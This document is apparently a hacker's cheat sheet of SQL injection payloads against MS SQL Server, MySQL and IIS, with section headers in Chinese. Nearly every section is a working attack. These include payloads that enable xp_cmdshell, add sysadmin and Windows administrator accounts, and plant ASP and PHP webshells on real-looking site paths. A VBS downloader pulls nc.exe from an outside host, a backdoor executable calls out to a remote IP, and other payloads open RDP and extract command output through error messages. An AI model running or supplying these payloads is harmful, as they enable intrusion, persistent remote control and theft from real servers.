[mysql inject to get path]
benchmark( 500000000, md5( 'test' ) )

[枚举盘符]
fsutil.exe fsinfo drives

[sa单语句cmdshell]
) and 1=(select top 1 * from openrowset('sqloledb','trusted_connection=yes','set fmtonly off exec master.dbo.xp_cmdshell ''net user|more %2B1''')) and (1=1

[cmd回显特定行]
dir|more +n

[404_cmd]
';exec master..xp_cmdshell 'ren C:\Windows\Help\iisHelp\common\404b.htm C:\Windows\Help\iisHelp\common\404b.htm.bak'--
';exec master..xp_cmdshell 'systeminfo >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ping 127.1 -n 5'--
';exec master..xp_cmdshell 'netstat -an >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'netstat -an >C:\Winnt\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'net start >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'ver >C:\Winnt\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber >C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber >C:\Windows\Help\iisHelp\common\404b.htm'--

';use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c systeminfo >C:\Windows\Help\iisHelp\common\404b.htm',0,true;--

';exec master..xp_cmdshell 'copy C:\Windows\Help\iisHelp\common\404b.htm.bak C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'del C:\Windows\Help\iisHelp\common\404b.htm.bak'--

[404_getpath]
';exec master..xp_cmdshell 'ren C:\Windows\Help\iisHelp\common\404b.htm C:\Windows\Help\iisHelp\common\404b.htm.bak'--
';exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'copy 2000.reg C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'regedit /s 2000.reg'--
';exec master..xp_cmdshell 'iisreset /reboot >C:\Windows\Help\iisHelp\common\404b.htm'--

';exec master..xp_cmdshell 'copy C:\Windows\Help\iisHelp\common\404b.htm.bak C:\Windows\Help\iisHelp\common\404b.htm'--
';exec master..xp_cmdshell 'del C:\Windows\Help\iisHelp\common\404b.htm.bak'--


[SQL2005导入文本文件]
BULK   INSERT POP..Booty
FROM   'C:\Inetpub\Data\POP3.LST'
WITH   ( 
        FIELDTERMINATOR   =';', 
        ROWTERMINATOR   =   '\n'
)

[Add_sa]
;exec master.dbo.sp_addlogin ice;-- 
;exec master.dbo.sp_addsrvrolemember ice,sysadmin--
;exec master.dbo.sp_password null,ice,ice;--
    旧密码,新密码,登录名

[vpn_拨入_cmd]
netsh ras set user ice permit

[search injec]
%' and 1=1 and '%'='

[xp_cmdshell]
';exec master..xp_cmdshell "ver"--
';exec master..xp_cmdshell "ping 127.1 -n 10"--
';exec master..xp_cmdshell "telnet www.civil.tsinghua.edu.cn 21"--
';exec master..xp_cmdshell "net1 user ice user1234!@#$ /add"--
';exec master..xp_cmdshell "net1 user ice user1234 /add"--
';exec master..xp_cmdshell "net1 localgroup administrators ice /add"--
';exec master..xp_cmdshell [net1 localgroup "remote desktop users" ice /add]--
';exec master..xp_cmdshell [D:\JWC_Server\img\door.exe 210.77.30.17 2828]-- 
';exec master..xp_cmdshell 'echo ^<%eval request(^"#^")%^> >c:\inetpub\wwwroot\little.asp'--
';exec master..xp_cmdshell 'echo 1 >d:\xyzp\1.txt'--

[VBS Downloader]
';exec master..xp_cmdshell "echo Set x= createObject(^""Microsoft.XMLHTTP^""):x.Open ^""GET^"",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^""ADODB.Stream^""):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >c:\wget.vbs"--
echo Set x= createObject(^"Microsoft.XMLHTTP^"):x.Open ^"GET^",LCase(WScript.Arguments(0)),0:x.Send():Set s = createObject(^"ADODB.Stream^"):s.Mode = 3:s.Type = 1:s.Open():s.Write(x.responseBody):s.SaveToFile LCase(WScript.Arguments(1)),2 >wget.vbs
';exec master..xp_cmdshell "c:\wget.vbs http://sis.ruc.edu.cn/nc.exe c:\nc.exe"--

[OA_Create]
';use master declare @o int exec sp_oacreate 'wscript.shell',@o out exec sp_oamethod @o,'run',NULL,'cmd /c net1 user ice user1234 /add',0,true;--

[Job]
';exec master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT'--
';use msdb exec sp_delete_job null,'x' exec sp_add_job 'x' exec sp_add_jobstep Null,'x',Null,'1','CMDEXEC','cmd /c net1 user ice user1234 /add' exec sp_add_jobserver Null,'x',@@servername exec sp_start_job 'x'--

[SQL 2000 恢复存储过程]
';exec master..sp_addextendedproc 'xp_cmdshell','xplog70.dll'--
';use master dbcc addextendedproc('sp_OACreate','odsole70.dll')--

[SQL 2005 开启sp_oacreate]
';exec sp_configure 'show advanced options', 1;RECONFIGURE;exec sp_configure 'Ole Automation Procedures',1;RECONFIGURE;--

[SQL 2005 开启OpenRowset/OpenDatasource]
';exec sp_configure 'show advanced options',1;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',1;reconfigure--

';exec sp_configure 'show advanced options',0;reconfigure;exec sp_configure 'Ad Hoc Distributed Queries',0;reconfigure--
[SQL 2005 恢复存储过程]
';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;--
过单引号
;declare @z nvarchar(4000) set @z=0x730068006F007700200061006400760061006E0063006500640020006F007000740069006F006E007300;declare @b nvarchar(4000) set @b=0x780070005F0063006D0064007300680065006C006C00;EXEC sp_configure @z,1;RECONFIGURE;EXEC sp_configure @b,1;RECONFIGURE;--

';EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 0;RECONFIGURE;--

[DBO BACKUP]

databasename=zgly

';alter database "china-pipe" set RECOVERY FULL--
';create table boyofbit (a image)--
';backup log "china-pipe" to disk = 'C:\amethyst' with init--
';insert into boyofbit (a) values ('<%Execute(request("#"))%>')--
';insert into boyofbit (a) values (0x3C256576616C20726571756573742822732229253E)--
';backup log "china-pipe" to disk = 'E:\chuban\csspw\l.asp'--
';backup log clientdata to disk =0x443A5C696E65747075625C6A6F62732E6C656564732E61632E756B5C776562726F6F745C6C6974746C652E617370--
';drop table boyofbit--

a).<%%25Execute(request("go"))%%25>
b).<%Execute(request("go"))%>
c).%><%execute request("go")%><%
d).<script language=VBScript runat=server>execute request("sb")</Script>
e).<%25Execute(request("l"))%25>

[3389]
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 00000000 /f
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections

reg add "HKLM\SYSTEM\CurrentControlSet\Services\IPSec" /v NoDefaultExempt /t REG_DWORD /d 00000000 /f
reg query "HKLM\SYSTEM\CurrentControlSet\Services\IPSec"

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp PortNumber
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp PortNumber

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber /t REG_DWORD /d 3389 /f
REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 3389 /f

reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp" /v PortNumber
reg query "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber

[DigitalProductId]
reg query "HKLM\SOFTWARE\MICROSOFT\Windows NT\CurrentVersion" /v DigitalProductId

[phpmyadmin]
use mysql;
CREATE TABLE ice (cmd text NOT NULL);
INSERT INTO ice (cmd) VALUES('<?php eval(stripslashes($_REQUEST[cmd]));?>');
select cmd from ice into outfile 'D:/WebSite/templates/default/little.php';
DROP TABLE IF EXISTS ice;

[makewebtask]
';exec sp_makewebtask 'D:\magtech\web\little.asp','select''<%execute(request("SB"))%>'' '
';exec sp_makewebtask 'D:\magtech\web\little.asp','select * from boyofbit'--

[xp_cmdshell]
;DROP TABLE [boyofbit];CREATE TABLE [boyofbit]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);--
;DELETE [boyofbit];insert into [boyofbit](ResultTxt) exec master.dbo.xp_cmdshell [netstat -an];--
and (Select ResultTxt from [boyofbit] where [id]=1)=0
;DROP TABLE [boyofbit]--

';DROP TABLE [boyofbit];CREATE TABLE [boyofbit]([id] int NOT NULL IDENTITY (1,1), [ResultTxt] nvarchar(4000) NULL);insert into [boyofbit](ResultTxt) exec master.dbo.xp_cmdshell 'ipconfig';insert into [boyofbit] values ('g_over')--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 1 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 2 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 3 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 4 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 5 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 6 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 7 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 8 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 9 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--
' And (Select Top 1 CASE WHEN ResultTxt is Null then char(124) else ResultTxt%2Bchar(124) End from (Select Top 10 id,ResultTxt from [boyofbit] order by [id]) T order by [id] desc)>0--

';DROP TABLE [boyofbit]--

[dir]
';DROP TABLE NoLove;CREATE TABLE NoLove(subdirectory nvarchar(400) NULL,depth tinyint NULL,[file] bit NULL)--
';DELETE NoLove;Insert NoLove exec master..xp_dirtree 'C:\',1,1--
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 1 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 2 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
' And (Select Top 1 cast([subdirectory] as nvarchar(400))%2Bchar(124)%2Bcast([file] as nvarchar(1))%2Bchar(124) From(Select Top 3 [subdirectory],[file] From NoLove ORDER BY [file],[subdirectory]) T ORDER BY [file] desc,[subdirectory] desc)=0 And 'fALSE'<>'
';DROP TABLE NoLove--
